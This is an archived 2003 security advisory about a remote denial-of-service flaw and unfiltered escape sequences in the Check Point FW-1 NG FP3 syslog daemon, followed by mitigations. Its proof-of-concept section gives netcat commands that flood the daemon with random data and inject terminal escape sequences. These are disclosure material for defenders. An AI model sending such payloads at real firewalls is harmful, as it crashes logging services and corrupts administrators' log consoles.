TUCoPS :: Unix :: General :: a6087.htm


TUCoPS :: Unix :: General :: a6087.htm

Check Point DoS attack against syslog daemon
22th Mar 2003 [SBWID-6087]
COMMAND
	Check Point DoS attack against syslog daemon
SYSTEMS AFFECTED
	Check Point FW-1 NG FP3 & FP3 HF1
PROBLEM
	Thanks to Peter of (P) & (C) 2003 AERAsec Network Services and
	Security GmbH, advisory :
	
	 http://www.aerasec.de/security/advisories/checkpoint-fw1-ng-fp3-syslog-crash.html
	 http://www.aerasec.de/security/index.html?id=3Dae-200303-064
	
	
	--snip--
	
	* Successful DoS from remote against syslog daemon of Check Point FW-1
	NG FP3 (also FP3 HF1), perhaps remote root exploit possible.
	
	* Syslog message containing escape sequences directed to syslog daemon
	of Check Point FW-1 NG FP3 (including HF1 and HF2) remain unfiltered
	and cause strange output behaviour if the log is viewed on console.
	
	--snip--
	
	Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off)
	to redirect incoming syslog messages from remote (e.g. routers) to
	Check Point's SmartTracker logging mechanism. This syslog daemon can be
	crashed from remote and it will not start again auotmatically. Neither
	a watchdog service is detecting the crash nor an entry in the SmartView
	Tracker about a no longer available syslog daemon appears.
	
	Additionally it will print all chars received in a syslog message from
	remote without any modifications. This means, escape sequences are not
	filtered or e.g. expanded to their octal values in ASCII.
	
	--snip--
	
	 Proof of concept
	 ================
	
	 1
	 =
	
	Start syslog daemon by enabling in the firewall object (and run
	cpstop/cpstart afterwards) or by hand executing:
	
	[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
	Shutting down kernel logger: [ OK ]
	Shutting down system logger: [ OK ]
	Starting system logger: [ OK ]
	Starting kernel logger: [ OK ]
	
	Segmentation fault <- caused after receiving random syslog payload,
	see below
	
	Check for listening syslog daemon:
	
	 [firewall]# netstat -lnptu |grep -w 514
	 udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog
	
	
	Note also that this daemon is running as "root":
	
	 # ps -ux | grep -w syslog
	 root $pid 0.0 6.8 148064 8612 ? S 12:17 0:00 syslog 514 all
	
	
	Send a valid syslog message from a remote host (here also a Linux
	system):
	
	 [evilhost]# echo "<189>19: 00:01:04: Test" | nc -u firewall 514
	
	
	Send random payload via syslog message from a remote host:
	
	 [evilhost]# cat /dev/urandom | nc -u firewall 514
	
	The previous started syslog daemon should crash after short time, use
	"netstat" to see whether a daemon is still listening on UDP port 514
	
	Note: for a clean restart of Check Point's syslog daemon the firewall
	service needs to be restarted.
	
	
	 2
	 =
	
	Enable receiving of syslog from remote by FW-1 like e.g. described
	above.
	
	View log on console by running following command:
	
	 [firewall]# fw lot -nfnl
	
	Send some special escape sequences via syslog, e.g.
	
	[evilhost]# echo -e "<189>19: 00:01:04:Test\a033円[2J033円[2;5m033円[1;31mHACKER~ATTACK033円[2;25m033円[22;30m033円[3q" | nc -u firewall 514
	
	
	Take a look at the console again, but don't be scared too much for
	now... Press CTRL-C and reset the console to standard by executing:
	
	 [firewall]# reset
	
	Attackers might send a lot of "special" escape sequences, for Linux as
	destination see "man console_codes" for more.
	
	Note: standard syslog daemon on a RHL 7.3 system treats code like this
	as shown here:
	
	Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q
	
SOLUTION
	Solutions to prevent the successful DoS attack against syslog service:
	
	- Upgrade to FP3 HF2 as soon as possible, see for more information
	(available since 14 March 2003) :
	
	 http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html 
	
	
	- Customize your ruleset and accept syslog messages only from dedicated
	(and trusted, see below) senders by the enforcement module
	
	Solutions to prevent unfiltered console output:
	
	- Filter log output by using "tr" like:
	
	 [firewall]# fw log -tfnl | tr '000円-011円013円-037円200円-377円' '*'
	
	(all chars with ASCII codes from from decimal 0-31 and 128-255 except
	10 for LF are replaced by a '*')
	
	- Update Check Point's syslog daemon to newer version once again, when
	available :
	
	 http://www.checkpoint.com/techsupport/alerts/syslog.html
	
	- Improve ruleset like suggested above.

AltStyle によって変換されたページ (->オリジナル) /

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH